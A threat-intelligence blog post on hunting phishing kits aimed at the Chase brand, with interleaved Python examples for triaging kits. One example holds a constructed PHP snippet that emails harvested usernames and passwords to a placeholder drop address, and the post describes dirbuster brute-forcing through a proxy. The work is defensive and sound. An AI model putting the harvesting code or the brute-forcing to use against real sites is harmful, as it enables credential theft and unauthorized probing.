Brand Protection & Hunting for Phishing Kits

Lounge Fly
8 min read · Sep 16, 2020

Having moved into the Cyber Threat Intelligence space not long ago, one of the gaps I was able to identify immediately was around valuable phishing intel: not so much the discovery of phishing sites impersonating your brand, but how to attribute them to specific threat actors or phishing kits and spread awareness of the techniques attackers use when trying to phish their victims.

Phishing kits are basically software packages sold to attackers that make it easy to spin up a phishing site to capture credentials. They generally aim to spoof a number of popular brands, allowing attackers to avoid spending time on much of the grunt work.

It’s still a major challenge, as most of the vendors I have experience with don’t do a lot outside of discovery. You will be able to identify typosquat domains based on keywords or other key attributes such as logo or image usage, but so many other questions seem to go unanswered. Another challenge is that newly registered domains aren’t necessarily weaponized or infringing on your brand yet, so you’re staring at placeholders and essentially have to go into monitoring mode until action can be taken.

Leading into the discussion, I want to share a good report from 2018 on phishing kits published by the security company Imperva. Their report includes a few key elements that help guide our research into the discovery and analysis of phishing sites. These include:

  • Analysis sources
  • Common techniques
  • Presence of the kit author’s signature
  • Buyer information

There are likely a number of methods we can use to discover and analyze kits in the wild, but I’ll discuss the one I tend to use and that works for me.

The tool we’re going to examine for initial discovery is called StalkPhish.

For up-to-date installation instructions, please visit the README in the project’s git repository.

StalkPhish leverages a number of OSINT APIs to identify phishing sites, such as urlscan.io, urlquery, Phishtank, Openphish and PhishStats. You can define keywords and activate modules via the config file. The image below shows a portion of the example.conf where you can get started. If you aren’t searching for a single keyword but for a list of keywords, you can define them here.

[Image: Example config]

For the purpose of this walk-through, I used keywords such as chase and chasebank to attempt to discover sites impersonating the Chase brand.

The following command tells StalkPhish to use our example.conf file and, where a site exposes one, to attempt to pull down the zip file containing the kit’s sources.

[Image: StalkPhish execution]

Depending on your query and whether or not you choose to search for .zip files, the script can take a bit of time to complete. Once it does, the results will be stored in the sqlite database. It’s normal to run into some false positives depending on your search keywords, however some sites do stand out more than others. First, you can sort by HTTP 200 responses to focus on sites that are still active. From there, you can investigate those that stand out by blatantly impersonating a specific brand, or those with commonalities such as the sites highlighted in the screenshot below. They appear to use a similar kit, judging by the names of the pages.

[Image: DB Browser for SQLite showing the StalkPhish results]

We can confirm our assumptions by taking a look at a site that both clearly impersonates the brand and has characteristics of potential kits.

[Image: Chase phishing page]

What’s next? Well, there are a few different things you can do at this point. Since we’re already at the site, I like to simply review the HTML source in the browser to get an idea of how the site functions. Most of the time you’ll see the form field values passed to back-end PHP pages that aren’t accessible for analysis, as is the case here.

[Image: HTML source of the phishing page]

All is not lost, however. There are some ways to pivot off of this information to further our investigation. We can expand our search using various OSINT sources as well as do some checks for open directories.

We already suspect a phishing kit is in play, so if we search for some common indicators we can expect to see other phishing sites using similar pages. We can confirm this using the urlscan.io service.

We can search for keywords like need3.php or surf*.php and get a number of hits. Here is a sample search:

page.url:"surf.php" OR page.url:"need3.php" OR page.url:"surf2.php" OR page.url:"surf3.php" OR page.url:"surf4.php"

[Image: Example urlscan.io search for surf3.php]

If you run the expanded search provided above you’ll get thousands of results. A quick glance gives you a pretty good idea that many of the results are phishing sites for popular banks.
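The two triage steps just described, filtering the StalkPhish results down to HTTP 200 hits and then looking for page names shared across hosts before pivoting to urlscan.io, are small enough to script. The following is an added example, not code from the article or from the StalkPhish project: the result rows and hostnames are constructed placeholders, and the (url, status) shape is an assumption about what you would pull out of the sqlite database rather than StalkPhish’s actual schema.

```python
from collections import defaultdict
from urllib.parse import urlparse

# Constructed sample of discovery results, shaped as (url, HTTP status) pairs
# like those StalkPhish records; the hostnames are placeholders, not real sites.
SAMPLE_ROWS = [
    ("http://kit-a.example/chase/surf.php", 200),
    ("http://kit-a.example/chase/need3.php", 200),
    ("http://kit-b.example/login/surf3.php", 200),
    ("http://kit-b.example/login/need3.php", 200),
    ("http://kit-c.example/secure/surf.php", 200),
    ("http://kit-c.example/secure/need3.php", 200),
    ("http://parked.example/", 200),
    ("http://gone.example/chase/surf.php", 404),
]


def page_name(url):
    """Return the lower-cased final path component of a URL, or None for '/'."""
    name = urlparse(url).path.rsplit("/", 1)[-1].lower()
    return name or None


def cluster_active_pages(rows, min_hosts=2):
    """Keep only HTTP 200 results (sites still up) and group them by PHP page name.

    Page names seen on at least `min_hosts` distinct hosts are returned with their
    sorted hosts; this is the 'commonalities' signal used to spot a shared kit.
    """
    hosts_by_page = defaultdict(set)
    for url, status in rows:
        if status != 200:
            continue
        name = page_name(url)
        if name is None or not name.endswith(".php"):
            continue
        hosts_by_page[name].add(urlparse(url).netloc)
    return {
        name: sorted(hosts)
        for name, hosts in hosts_by_page.items()
        if len(hosts) >= min_hosts
    }


def urlscan_query(page_names):
    """Build a urlscan.io search string of the form used above from page names."""
    return " OR ".join(f'page.url:"{name}"' for name in sorted(page_names))


if __name__ == "__main__":
    clusters = cluster_active_pages(SAMPLE_ROWS)
    for name, hosts in clusters.items():
        print(f"{name}: {', '.join(hosts)}")
    print(urlscan_query(clusters))
```

The `min_hosts` threshold is what keeps generic names like `index.php` or `login.php` from dominating; raise it when the result set is large. The page-name key is deliberately the whole filename, since kits tend to reuse their exact page names (`surf.php`, `need3.php`) across deployments.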

The problem remains that we can’t actually see what the .php files are doing, so it’s difficult for us to determine things such as buyer or author information, but maybe we can extend our OSINT searches to gather some kit info.

You can search Google for keywords like need3.php combined with opendir and you’ll probably find a few public sandbox reports. Here’s an example from the any.run submissions.

https://app.any.run/tasks/51e2777e-825a-4575-a2ea-8f819a413484/#

Despite being tagged as opendir, it appears to refer to some images rather than giving access to the PHP files, so we hit a bit of a dead end here, which unfortunately happens from time to time and that’s alright. We’re not done yet, though. We can try searching VirusTotal for our keywords as well (I’m not sure whether this capability exists only with a VT Intelligence subscription). At any rate, searching for need3.php generates a number of results. In particular, I’m interested in the .zip files since they could contain complete kits. We can also refine our search further to something like entity:file tag:"zip" AND need3.php

Interestingly, we already see results that are geared toward Chase zip files.

Taking a random file that a number of detection engines classify with some sort of phishing signature, we can see that some of its contents are aligned with the kits we wish to explore.

https://www.virustotal.com/gui/file/1b38a0dfc80af040fcc2b7501747019a586d34a4f2208793ff51e402299ec859/detection

[Image: VirusTotal file report]

If you don’t have a VT Intelligence account, you can search for the hashes on other public sources that may give you the ability to download the files for further analysis. Downloading this zip and moving it to our analysis environment, we can collect some relevant information.

First, the .htaccess file denies access to a number of IP addresses.

If you wish, you can look up who owns these IP ranges to try to determine exactly whom the kit is attempting to deny access to.

Browsing other files we can see some additional anti-analysis techniques in play. Here is a snippet from the hostname.php file.

[Image: hostname.php]

It looks like the kit attempts to block access from some common brand and phishing protection vendors.
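When a kit ships a deny list like the one above, the first practical question for an analyst is whether your own scanning or sandbox egress addresses fall inside it, since that explains HTTP 403s and empty crawls and tells you which vendor ranges the author is trying to evade. Below is an added example, not code from the article or from the kit: it parses Apache-style `Deny from` directives (an assumption about the .htaccess format, since the article only shows a screenshot) and answers that question for a given address. The .htaccess excerpt is constructed and uses documentation address ranges; the hostname.php logic is not shown on the page, so the example does not cover it.

```python
import ipaddress
import re

# Constructed .htaccess excerpt in the Apache 2.2 "Deny from" style that kits
# commonly use; the ranges are documentation addresses, not real vendor ranges.
SAMPLE_HTACCESS = """\
# constructed sample, not the kit's real file
Order Allow,Deny
Allow from all
Deny from 192.0.2.0/24
deny from 198.51.100.7 198.51.100.8
Deny from 203.0.113
"""

DENY_RE = re.compile(r"^\s*deny\s+from\s+(.+?)\s*$", re.IGNORECASE)


def token_to_network(token):
    """Translate one 'Deny from' argument into an IP network.

    Apache accepts a full address, a CIDR, or a partial dotted prefix such as
    '203.0.113', which means 203.0.113.0/24; 'all' matches everything.
    """
    token = token.strip()
    if token.lower() == "all":
        return ipaddress.ip_network("0.0.0.0/0")
    if "/" in token:
        return ipaddress.ip_network(token, strict=False)
    octets = token.split(".")
    if 0 < len(octets) < 4 and all(o.isdigit() for o in octets):
        padded = octets + ["0"] * (4 - len(octets))
        return ipaddress.ip_network(f"{'.'.join(padded)}/{8 * len(octets)}")
    return ipaddress.ip_network(token)  # single host -> /32 (or /128 for IPv6)


def parse_deny_list(text):
    """Return the list of networks denied by the .htaccess text."""
    nets = []
    for line in text.splitlines():
        match = DENY_RE.match(line)
        if not match:
            continue  # comments, Order/Allow lines and anything else
        for token in match.group(1).split():
            nets.append(token_to_network(token))
    return nets


def is_blocked(ip, nets):
    """True if `ip` falls in any denied network."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in nets)


if __name__ == "__main__":
    denied = parse_deny_list(SAMPLE_HTACCESS)
    print("denied networks:", ", ".join(str(n) for n in denied))
    for probe in ("192.0.2.77", "198.51.100.9", "203.0.113.200"):
        print(probe, "blocked" if is_blocked(probe, denied) else "allowed")
```

Feed the parsed networks to a WHOIS or ASN lookup of your choice to attribute them to vendors, as the article suggests; the parser intentionally handles partial prefixes because kits frequently block whole /8 or /16 ranges with a bare `Deny from 66.249`-style entry.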

Next we’ll look at a few of the files we pointed out previously during our initial discovery, more specifically the need3.php file. We can see a number of variables defined that give us an idea of the type of information the kit is collecting and of its additional functionality.

[Image: need3.php]

You’ll also notice the inclusion of the email.php file. Looking at this file, we hit the jackpot. Granted, this isn’t necessarily the same buyer as the sites we discovered, but it allows us to understand the full functionality nevertheless.

[Image: email.php]

You can use the email address not only from an intel perspective but also to report abuse and have the address taken down, hopefully limiting the impact on potential victims.
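The walk through need3.php and email.php above is a manual static triage: find the fields the kit harvests, follow the include, and recover the drop address passed to `mail()`. That triage can be scripted so it runs over every kit archive you pull down and emits the abuse-report material directly. The following is an added example, not code from the article or from the kit: the two PHP sources are constructed to have the shape the article describes, the drop address is a placeholder, and the regex-based approach is an assumption that the kit stores its recipient in a plain string assignment (obfuscated kits need more than this).

```python
import re

# Constructed sample kit: two files shaped like the ones discussed above.
# The recipient address is a placeholder, not one taken from a real kit.
SAMPLE_KIT = {
    "need3.php": r"""<?php
// constructed sample, not the real need3.php
include("email.php");
$user = $_POST['username'];
$pass = $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];
$msg = "User: $user\nPass: $pass\nIP: $ip";
mail($recipient, "New login", $msg);
header("Location: surf2.php");
?>""",
    "email.php": r"""<?php
// constructed sample; placeholder drop address
$recipient = "dropbox@example.net";
?>""",
}

# Harvested form fields, e.g. $_POST['username']
FIELD_RE = re.compile(r"\$_(?:POST|GET|REQUEST)\[\s*['\"]([^'\"]+)['\"]\s*\]")
# Simple string assignments, e.g. $recipient = "...";
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*['\"]([^'\"]+)['\"]\s*;")
# First argument of mail(): either a variable or a string literal
MAIL_RE = re.compile(r"\bmail\s*\(\s*(\$\w+|['\"][^'\"]+['\"])")
# include/require targets, which reveal the kit's file structure
INCLUDE_RE = re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"]([^'\"]+)['\"]")
# Redirect chain between kit pages
REDIRECT_RE = re.compile(r"header\s*\(\s*['\"]Location:\s*([^'\"]+)['\"]")
# Any email-looking string, to catch addresses not routed through mail()
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")


def triage_kit(files):
    """Static triage of a kit given as {filename: php_source}.

    Returns sorted lists of harvested fields, included files, redirect targets,
    mail() recipients (resolved across files) and every email-looking string.
    """
    # Assignments are collected across all files first, because the recipient
    # is typically defined in email.php and used in the page that calls mail().
    assignments = {}
    for src in files.values():
        for name, value in ASSIGN_RE.findall(src):
            assignments[name] = value

    report = {"fields": set(), "includes": set(), "redirects": set(),
              "recipients": set(), "emails": set()}
    for src in files.values():
        report["fields"].update(FIELD_RE.findall(src))
        report["includes"].update(INCLUDE_RE.findall(src))
        report["redirects"].update(REDIRECT_RE.findall(src))
        report["emails"].update(EMAIL_RE.findall(src))
        for arg in MAIL_RE.findall(src):
            if arg.startswith("$"):
                value = assignments.get(arg[1:])
                if value:
                    report["recipients"].add(value)
            else:
                report["recipients"].add(arg.strip("'\""))
    return {key: sorted(values) for key, values in report.items()}


if __name__ == "__main__":
    for key, values in triage_kit(SAMPLE_KIT).items():
        print(f"{key}: {values}")
```

The `recipients` list is what goes into the abuse report to the mail provider; `fields` tells you what victims lost (and therefore what to advise them to reset), and `includes` plus `redirects` give you the page-name chain to feed back into the urlscan.io search from earlier.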

An additional piece of the puzzle is kit attribution, which unfortunately we weren’t able to obtain with this specific kit/zip archive. You can certainly research similar files to try to determine whether any of them do in fact contain some sort of author info.

We were able to collect a lot of this information using open source services, but what if you wanted to gather the information yourself? Well, we already spoke about how StalkPhish has the capability to pull down the zip files it finds. Another tool, which is part of Kali Linux, is dirbuster.

Dirbuster attempts to brute force directory structures on specified sites, which can help yield valuable information. There have been plenty of times where less sophisticated kits, and attackers who failed to secure their phishing sites, left valuable accessible artifacts on the sites, including text files of victims’ username/password combos.

[Image: dirbuster]

Dirbuster is easy enough to use. Input the URL and select the word list you wish to use. You can speed up the process by increasing the number of threads, but keep in mind that this sometimes raises alarm bells and could get your IP blocked if it triggers any security controls. You also have the capability to use the tool over a proxy in the event this occurs or you need some sort of anonymity.

Remember, using tools like this may be considered “hacking back”, and running them against sites, regardless of your intent, could get you into trouble. This is specifically meant to educate you on the capabilities available.

We were able to gather a decent amount of intelligence from this process, which can expand the types of actors and threats tracked as part of our intel process. I’m sure there are plenty of techniques and things I may be missing, but I hope this at least provides a good starting point for collecting and analyzing phishing threats against your brand.
